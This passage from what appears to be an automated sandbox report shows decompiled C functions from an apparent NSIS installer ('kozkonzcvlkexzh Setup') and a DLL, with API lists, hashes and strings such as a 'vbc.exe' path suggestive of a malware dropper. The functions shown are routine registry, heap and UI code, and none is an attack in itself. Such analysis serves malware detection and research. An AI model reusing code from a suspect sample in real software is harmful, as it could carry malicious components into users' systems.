                                                						if(__eflags != 0) {
                                                							goto L8;
                                                						}
                                                						_t28 = RegDeleteKeyA(_a4, _a8);
                                                						__eflags = _t28;
                                                						if(_t28 != 0) {
                                                							goto L8;
                                                						}
                                                						return _t28;
                                                					}
                                                					return  *_t27(_a4, _a8,  *0x423ff0, 0);
                                                				}
                                                				return _t18;
                                                			}











                                                APIs
                                                • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000000,?), ref: 00402A8A
                                                • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Close$DeleteEnumOpen
                                                • String ID:
                                                • API String ID: 1912718029-0
                                                • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                                • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 96%
                                                			E1000D06A(void* __ebx, void* __edx, void* __edi, void* _a4, long _a8) {
                                                				void* _t7;
                                                				long _t8;
                                                				intOrPtr* _t9;
                                                				intOrPtr* _t12;
                                                				long _t20;
                                                				long _t31;
                                                
                                                				if(_a4 != 0) {
                                                					_t31 = _a8;
                                                					__eflags = _t31;
                                                					if(_t31 != 0) {
                                                						_push(__ebx);
                                                						while(1) {
                                                							__eflags = _t31 - 0xffffffe0;
                                                							if(_t31 > 0xffffffe0) {
                                                								break;
                                                							}
                                                							__eflags = _t31;
                                                							if(_t31 == 0) {
                                                								_t31 = _t31 + 1;
                                                								__eflags = _t31;
                                                							}
                                                							_t7 = HeapReAlloc( *0x1001dc40, 0, _a4, _t31);
                                                							_t20 = _t7;
                                                							__eflags = _t20;
                                                							if(_t20 != 0) {
                                                								L17:
                                                								_t8 = _t20;
                                                							} else {
                                                								__eflags =  *0x1001dc3c - _t7;
                                                								if(__eflags == 0) {
                                                									_t9 = E1000983A(__eflags);
                                                									 *_t9 = E10009881(GetLastError());
                                                									goto L17;
                                                								} else {
                                                									__eflags = E10009807(_t7, _t31);
                                                									if(__eflags == 0) {
                                                										_t12 = E1000983A(__eflags);
                                                										 *_t12 = E10009881(GetLastError());
                                                										L12:
                                                										_t8 = 0;
                                                										__eflags = 0;
                                                									} else {
                                                										continue;
                                                									}
                                                								}
                                                							}
                                                							goto L14;
                                                						}
                                                						E10009807(_t6, _t31);
                                                						 *((intOrPtr*)(E1000983A(__eflags))) = 0xc;
                                                						goto L12;
                                                					} else {
                                                						E1000A32A(_a4);
                                                						_t8 = 0;
                                                					}
                                                					L14:
                                                					return _t8;
                                                				} else {
                                                					return E1000591F(__ebx, __edx, __edi, _a8);
                                                				}
                                                			}










                                                APIs
                                                • _malloc.LIBCMT ref: 1000D076
                                                  • Part of subcall function 1000591F: __FF_MSGBANNER.LIBCMT ref: 10005936
                                                  • Part of subcall function 1000591F: __NMSG_WRITE.LIBCMT ref: 1000593D
                                                  • Part of subcall function 1000591F: RtlAllocateHeap.NTDLL(005A0000,00000000,00000001,?,?,?,?,10003D2C), ref: 10005962
                                                • _free.LIBCMT ref: 1000D089
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: AllocateHeap_free_malloc
                                                • String ID:
                                                • API String ID: 1020059152-0
                                                • Opcode ID: 8b1ed2aa7eabe4bd22de2cddccfdb6ae4c005e2958cc87990c05da668bc3cf15
                                                • Instruction ID: aad7ab1cb34914432ac4bacb246f22d2d5f71633821f67d74deb23b6b735991f
                                                • Opcode Fuzzy Hash: 8b1ed2aa7eabe4bd22de2cddccfdb6ae4c005e2958cc87990c05da668bc3cf15
                                                • Instruction Fuzzy Hash: D411C132804226ABFB25BF709C4574E3BC4EF022E4F20C527F94C9A259DF319A4287B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00401CDE(int __edx) {
                                                				void* _t17;
                                                				struct HINSTANCE__* _t21;
                                                				struct HWND__* _t25;
                                                				void* _t27;
                                                
                                                				_t25 = GetDlgItem( *(_t27 - 8), __edx);
                                                				GetClientRect(_t25, _t27 - 0x50);
                                                				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
                                                				if(_t17 != _t21) {
                                                					DeleteObject(_t17);
                                                				}
                                                				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t27 - 4));
                                                				return 0;
                                                			}








                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                • Opcode ID: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                                • Opcode Fuzzy Hash: b6dc52a7f50dc5a5b8d69a970bc0364d2e288b966cb10631b9234e7e7e1bdde9
                                                • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E00404649(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                				char _v36;
                                                				char _v68;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t21;
                                                				signed int _t22;
                                                				void* _t29;
                                                				void* _t31;
                                                				void* _t32;
                                                				void* _t41;
                                                				signed int _t43;
                                                				signed int _t47;
                                                				signed int _t50;
                                                				signed int _t51;
                                                				signed int _t53;
                                                
                                                				_t21 = _a16;
                                                				_t51 = _a12;
                                                				_t41 = 0xffffffdc;
                                                				if(_t21 == 0) {
                                                					_push(0x14);
                                                					_pop(0);
                                                					_t22 = _t51;
                                                					if(_t51 < 0x100000) {
                                                						_push(0xa);
                                                						_pop(0);
                                                						_t41 = 0xffffffdd;
                                                					}
                                                					if(_t51 < 0x400) {
                                                						_t41 = 0xffffffde;
                                                					}
                                                					if(_t51 < 0xffff3333) {
                                                						_t50 = 0x14;
                                                						asm("cdq");
                                                						_t22 = 1 / _t50 + _t51;
                                                					}
                                                					_t23 = _t22 & 0x00ffffff;
                                                					_t53 = _t22 >> 0;
                                                					_t43 = 0xa;
                                                					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                				} else {
                                                					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                					_t47 = 0;
                                                				}
                                                				_t29 = E00405BBA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                				_t31 = E00405BBA(_t41, _t47, _t53,  &_v68, _t41);
                                                				_t32 = E00405BBA(_t41, _t47, 0x420538, 0x420538, _a8);
                                                				wsprintfA(_t32 + lstrlenA(0x420538), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                				return SetDlgItemTextA( *0x423718, _a4, 0x420538);
                                                			}




















                                                APIs
                                                • lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                                • wsprintfA.USER32 ref: 004046EF
                                                • SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s
                                                • API String ID: 3540041739-3551169577
                                                • Opcode ID: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                • Instruction ID: 33c490f36d39f428f4b6feb88c055206d8f5fbd89635bf607d329e374d543c8d
                                                • Opcode Fuzzy Hash: 9ec326ac30901ad515aaf80f2404a58f9bab4133aba90e091d0e9c932beca6f7
                                                • Instruction Fuzzy Hash: 5A11D873A0512437EB0065699C41EAF329CDB82335F150637FE26F31D1E9B9DD1145E8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 44%
                                                			E10004150(void* __ebx, void* __edi, void* __fp0, char* _a4) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				char _v13;
                                                				void* _v14;
                                                				signed int _v20;
                                                				intOrPtr _v24;
                                                				char* _v28;
                                                				signed char _t50;
                                                				char* _t54;
                                                				char* _t71;
                                                				char* _t76;
                                                				signed int _t82;
                                                				char** _t90;
                                                
                                                				_v8 = 0;
                                                				_v12 = 0;
                                                				_t71 = _a4;
                                                				_t92 =  *(_t71 + 0x18) & 0x0000000f;
                                                				_t82 = 1;
                                                				_v13 = 1;
                                                				if(( *(_t71 + 0x18) & 0x0000000f) != 0) {
                                                					 *_t90 = L"(dec->bit_pos & 0xF) == 0";
                                                					_v28 = L"Source.c";
                                                					_v24 = 0xaa;
                                                					E10005297(__ebx, 1, __edi, _t92, __fp0);
                                                					_v13 = 0;
                                                				}
                                                				while(_a4[0x18] != 0) {
                                                					_a4[0x18] = _a4[0x18] - 0x10;
                                                					_v8 = (_a4[0x14] >> _a4[0x18] & 0x0000ffff) << _v12 | _v8;
                                                					_v12 = _v12 + 0x10;
                                                				}
                                                				while(1) {
                                                					__eflags = _v12 - 0x20;
                                                					_v14 = 0;
                                                					if(_v12 < 0x20) {
                                                						_t54 = _a4;
                                                						_t76 = _a4;
                                                						__eflags =  *((intOrPtr*)(_t54 + 4)) + 2 -  *((intOrPtr*)(_t76 + 8));
                                                						_t32 =  *((intOrPtr*)(_t54 + 4)) + 2 -  *((intOrPtr*)(_t76 + 8)) < 0;
                                                						__eflags = _t32;
                                                						_v14 = _t82 & 0xffffff00 | _t32;
                                                					}
                                                					_t50 = _v14;
                                                					__eflags = _t50 & 0x00000001;
                                                					if((_t50 & 0x00000001) == 0) {
                                                						break;
                                                					}
                                                					 *_t90 = _a4;
                                                					_v20 = E10004030() & 0x0000ffff;
                                                					_v8 = _v20 << _v12 | _v8;
                                                					_t82 = _v12 + 0x10;
                                                					_v12 = _t82;
                                                				}
                                                				return _v8;
                                                 			}

                                                APIs
                                                • __wassert.LIBCMT ref: 10004199
                                                  • Part of subcall function 10005297: GetModuleHandleExW.KERNEL32(00000006,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000535C
                                                  • Part of subcall function 10005297: GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 10005388
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Module$FileHandleName__wassert
                                                • String ID: $(dec->bit_pos & 0xF) == 0$Source.c
                                                • API String ID: 1832359313-2493867184
                                                • Opcode ID: 5c08706582030b261e21bbc914382971aab491052d29c33789c90defc3be8190
                                                • Instruction ID: 51f6379824fe9e4415b07059da216bb01802ed9ed433fbb833ff1512406a754a
                                                • Opcode Fuzzy Hash: 5c08706582030b261e21bbc914382971aab491052d29c33789c90defc3be8190
                                                • Instruction Fuzzy Hash: 14312B74A04248EFDB04DF98C090A9DBFF1EF54380F25849DE8899B346D731EA85DB85
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 51%
                                                			E00401BCA() {
                                                				signed int _t28;
                                                				CHAR* _t31;
                                                				long _t32;
                                                				int _t37;
                                                				signed int _t38;
                                                				int _t42;
                                                				int _t48;
                                                				struct HWND__* _t52;
                                                				void* _t55;
                                                
                                                				 *(_t55 - 8) = E00402A0C(3);
                                                				 *(_t55 + 8) = E00402A0C(4);
                                                				if(( *(_t55 - 0x14) & 0x00000001) != 0) {
                                                					 *((intOrPtr*)(__ebp - 8)) = E00402A29(0x33);
                                                				}
                                                				__eflags =  *(_t55 - 0x14) & 0x00000002;
                                                				if(( *(_t55 - 0x14) & 0x00000002) != 0) {
                                                					 *(_t55 + 8) = E00402A29(0x44);
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t55 - 0x2c)) - 0x21;
                                                				_push(1);
                                                				if(__eflags != 0) {
                                                					_t50 = E00402A29();
                                                					_t28 = E00402A29();
                                                					asm("sbb ecx, ecx");
                                                					asm("sbb eax, eax");
                                                					_t31 =  ~( *_t27) & _t50;
                                                					__eflags = _t31;
                                                					_t32 = FindWindowExA( *(_t55 - 8),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
                                                					goto L10;
                                                				} else {
                                                					_t52 = E00402A0C();
                                                					_t37 = E00402A0C();
                                                					_t48 =  *(_t55 - 0x14) >> 2;
                                                					if(__eflags == 0) {
                                                						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8));
                                                						L10:
                                                						 *(_t55 - 0xc) = _t32;
                                                					} else {
                                                						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 8),  *(_t55 + 8), _t42, _t48, _t55 - 0xc);
                                                						asm("sbb eax, eax");
                                                						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
                                                					}
                                                				}
                                                				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - _t42;
                                                				if( *((intOrPtr*)(_t55 - 0x28)) >= _t42) {
                                                					_push( *(_t55 - 0xc));
                                                					E00405AF6();
                                                				}
                                                				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t55 - 4));
                                                				return 0;
                                                 			}

                                                APIs
                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                • SendMessageA.USER32 ref: 00401C42
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                • Instruction ID: 8eb34b9659dedbc099cc11ce9bc18cab6bc834bdcc036981f8d30f042af137bc
                                                • Opcode Fuzzy Hash: 5e155985e8b695c365f3075347fc5cad64183b83899d6bbba3f89d2116927a25
                                                • Instruction Fuzzy Hash: C621A171A44149BEEF02AFF4C94AAEE7B75EF44704F10407EF501BA1D1DAB88A40DB29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004038B4(void* __ecx, void* __eflags) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed short _t6;
                                                				intOrPtr _t11;
                                                				signed int _t13;
                                                				intOrPtr _t15;
                                                				signed int _t16;
                                                				signed short* _t18;
                                                				signed int _t20;
                                                				signed short* _t23;
                                                				intOrPtr _t25;
                                                				signed int _t26;
                                                				intOrPtr* _t27;
                                                
                                                				_t24 = "1033";
                                                				_t13 = 0xffff;
                                                				_t6 = E00405B0F(__ecx, "1033");
                                                				while(1) {
                                                					_t26 =  *0x423f84; // 0x1
                                                					if(_t26 == 0) {
                                                						goto L7;
                                                					}
                                                					_t15 =  *0x423f50; // 0x601fd8
                                                					_t16 =  *(_t15 + 0x64);
                                                					_t20 =  ~_t16;
                                                					_t18 = _t16 * _t26 +  *0x423f80;
                                                					while(1) {
                                                						_t18 = _t18 + _t20;
                                                						_t26 = _t26 - 1;
                                                						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                							break;
                                                						}
                                                						if(_t26 != 0) {
                                                							continue;
                                                						}
                                                						goto L7;
                                                					}
                                                					 *0x423720 = _t18[1];
                                                					 *0x423fe8 = _t18[3];
                                                					_t23 =  &(_t18[5]);
                                                					if(_t23 != 0) {
                                                						 *0x42371c = _t23;
                                                						E00405AF6(_t24,  *_t18 & 0x0000ffff);
                                                						SetWindowTextA( *0x420510, E00405BBA(_t13, _t24, _t26, "kozkonzcvlkexzh Setup", 0xfffffffe));
                                                						_t11 =  *0x423f6c; // 0x2
                                                						_t27 =  *0x423f68; // 0x602184
                                                						if(_t11 == 0) {
                                                							L15:
                                                							return _t11;
                                                						}
                                                						_t25 = _t11;
                                                						do {
                                                							_t11 =  *_t27;
                                                							if(_t11 != 0) {
                                                								_t5 = _t27 + 0x18; // 0x60219c
                                                								_t11 = E00405BBA(_t13, _t25, _t27, _t5, _t11);
                                                							}
                                                							_t27 = _t27 + 0x418;
                                                							_t25 = _t25 - 1;
                                                						} while (_t25 != 0);
                                                						goto L15;
                                                					}
                                                					L7:
                                                					if(_t13 != 0xffff) {
                                                						_t13 = 0;
                                                					} else {
                                                						_t13 = 0x3ff;
                                                					}
                                                				}
                                                 			}

                                                APIs
                                                • SetWindowTextA.USER32(00000000,kozkonzcvlkexzh Setup), ref: 0040394C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID: "C:\Users\Public\vbc.exe" $1033$kozkonzcvlkexzh Setup
                                                • API String ID: 530164218-1525549739
                                                • Opcode ID: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                • Instruction ID: 9405f6c8d043b7fcf606726b90d8bdb5e10644d2b1bbff0bcd5da451eaf68503
                                                • Opcode Fuzzy Hash: efc42492ee7b8a51a3ec7fa34d8682ca64c79934ee229eb602048578ff3af0eb
                                                • Instruction Fuzzy Hash: D211CFB1F006119BC7349F15E88093777BDEB89716369817FE801A73E0D67DAE029A98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 16%
                                                			E10008671(void* __ecx, intOrPtr _a4) {
                                                				struct HINSTANCE__* _v8;
                                                				_Unknown_base(*)()* _t4;
                                                
                                                				_t4 =  &_v8;
                                                				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t4, __ecx);
                                                				if(_t4 != 0) {
                                                					_t4 = GetProcAddress(_v8, "CorExitProcess");
                                                					if(_t4 != 0) {
                                                						return  *_t4(_a4);
                                                					}
                                                				}
                                                				return _t4;
                                                			}






                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,10003D2C,?,?,10008666,?,?,10009F8C,000000FF,0000001E,10019430,00000008,10009F2F,?,?), ref: 10008680
                                                • GetProcAddress.KERNEL32(10003D2C,CorExitProcess,?,?,10008666,?,?,10009F8C,000000FF,0000001E,10019430,00000008,10009F2F,?,?), ref: 10008692
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 1646373207-1276376045
                                                • Opcode ID: 99db58fcea7d838a768e0348fb6ebae947b0658cd6e5d5674898ffd9bc574825
                                                • Instruction ID: 88e7426cc6f18b6d54fdb2bec73e2c841fe4e9f9ca8465ac7c6cc65ddea0344f
                                                • Opcode Fuzzy Hash: 99db58fcea7d838a768e0348fb6ebae947b0658cd6e5d5674898ffd9bc574825
                                                • Instruction Fuzzy Hash: 62D01730600208BBEF41DBA1CC85FAA7BACEB05681F054165F909E5060DB32DB609B6A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0040568B(CHAR* _a4) {
                                                				CHAR* _t7;
                                                
                                                				_t7 = _a4;
                                                				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
                                                					lstrcatA(_t7, 0x409010);
                                                				}
                                                				return _t7;
                                                			}





                                                APIs
                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405691
                                                • CharPrevA.USER32(?,00000000), ref: 0040569A
                                                • lstrcatA.KERNEL32(?,00409010), ref: 004056AB
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040568B
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.493663175.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.493656469.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493675836.0000000000407000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.493685746.0000000000409000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493695957.0000000000422000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493705633.000000000042A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.493715125.000000000042D000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-4017390910
                                                • Opcode ID: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                • Instruction ID: e5ee9c2d52b027f92723a61f0ff242ac356e57f7af316d882355b101730f0027
                                                • Opcode Fuzzy Hash: e3dc442850fe5195f819a2e9cc08a879faccac673fa9b112cfeaaf00c09b2b73
                                                • Instruction Fuzzy Hash: 05D0A972606A302AE60227158C09F8B3A2CCF02321B040462F540B6292C2BC7D818BEE
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E1000E2CE(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v8;
                                                				intOrPtr _v12;
                                                				int _v20;
                                                				void* __ebx;
                                                				int _t35;
                                                				int _t38;
                                                				intOrPtr* _t44;
                                                				int _t47;
                                                				short* _t49;
                                                				intOrPtr _t50;
                                                				intOrPtr _t54;
                                                				int _t55;
                                                				int _t59;
                                                				char* _t62;
                                                
                                                				_t62 = _a8;
                                                				if(_t62 == 0) {
                                                					L5:
                                                					return 0;
                                                				}
                                                				_t50 = _a12;
                                                				if(_t50 == 0) {
                                                					goto L5;
                                                				}
                                                				if( *_t62 != 0) {
                                                					E1000A920(_t50,  &_v20, _a16);
                                                					_t35 = _v20;
                                                					__eflags =  *(_t35 + 0xa8);
                                                					if( *(_t35 + 0xa8) != 0) {
                                                						_t38 = E1000E10D( *_t62 & 0x000000ff,  &_v20);
                                                						__eflags = _t38;
                                                						if(_t38 == 0) {
                                                							__eflags = _a4;
                                                							_t59 = 1;
                                                							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                                							if(__eflags != 0) {
                                                								L21:
                                                								__eflags = _v8;
                                                								if(_v8 != 0) {
                                                									_t54 = _v12;
                                                									_t31 = _t54 + 0x70;
                                                									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                                									__eflags =  *_t31;
                                                								}
                                                								return _t59;
                                                							}
                                                							L20:
                                                							_t44 = E1000983A(__eflags);
                                                							_t59 = _t59 | 0xffffffff;
                                                							__eflags = _t59;
                                                							 *_t44 = 0x2a;
                                                							goto L21;
                                                						}
                                                						_t59 = _v20;
                                                						__eflags =  *(_t59 + 0x74) - 1;
                                                						if( *(_t59 + 0x74) <= 1) {
                                                							L15:
                                                							__eflags = _t50 -  *(_t59 + 0x74);
                                                							L16:
                                                							if(__eflags < 0) {
                                                								goto L20;
                                                							}
                                                							__eflags = _t62[1];
                                                							if(__eflags == 0) {
                                                								goto L20;
                                                							}
                                                							L18:
                                                							_t59 =  *(_t59 + 0x74);
                                                							goto L21;
                                                						}
                                                						__eflags = _t50 -  *(_t59 + 0x74);
                                                						if(__eflags < 0) {
                                                							goto L16;
                                                						}
                                                						__eflags = _a4;
                                                						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
                                                						_t59 = _v20;
                                                						__eflags = _t47;
                                                						if(_t47 != 0) {
                                                							goto L18;
                                                						}
                                                						goto L15;
                                                					}
                                                					_t55 = _a4;
                                                					__eflags = _t55;
                                                					if(_t55 != 0) {
                                                						 *_t55 =  *_t62 & 0x000000ff;
                                                					}
                                                					_t59 = 1;
                                                					goto L21;
                                                				}
                                                				_t49 = _a4;
                                                				if(_t49 != 0) {
                                                					 *_t49 = 0;
                                                				}
                                                				goto L5;
                                                			}


















                                                APIs
                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000E304
                                                • __isleadbyte_l.LIBCMT ref: 1000E332
                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,00000000,00000000,?,000000AA), ref: 1000E360
                                                • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,000000AA), ref: 1000E396
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.497246318.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000004.00000002.497232899.0000000010000000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497307012.0000000010014000.00000002.00020000.sdmp
                                                • Associated: 00000004.00000002.497331845.000000001001A000.00000004.00020000.sdmp
                                                • Associated: 00000004.00000002.497358884.000000001001F000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                • String ID:
                                                • API String ID: 3058430110-0
